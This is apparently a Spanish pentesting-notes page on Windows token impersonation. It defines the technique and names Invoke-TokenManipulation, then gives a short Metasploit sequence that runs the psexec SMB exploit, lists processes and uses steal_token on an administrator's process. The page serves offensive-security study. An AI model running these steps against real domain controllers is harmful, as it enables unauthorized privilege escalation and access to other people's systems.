Page cover

🪙Token Impersonation

La token impersonation (o suplantación de token) es una técnica de ataque que se utiliza para obtener acceso no autorizado a recursos de sistema y aplicaciones en sistemas operativos Windows.

En un ataque de token impersonation, un atacante utiliza distintas herramientas para extraer el token de acceso de un usuario con permisos elevados en Windows. Una vez que el atacante tiene acceso al token de acceso, puede utilizar herramientas como Invoke-TokenManipulation para suplantar el token de acceso del usuario con permisos elevados y obtener acceso no autorizado a los recursos del sistema y aplicaciones que el usuario con permisos elevados estaría autorizado a utilizar.

Con Metasploit

  • Meter Kali en la misma red que el DC

msfconsole
use exploit/windows/smb/psexec
exploit
ps 
# nos muestra todos los procesos abiertos
# Ver el proceso que está siendo ejecutado por un administrador
Proceso ejecutándose por un administrador
steal_token 7924

Última actualización

¿Te fue útil?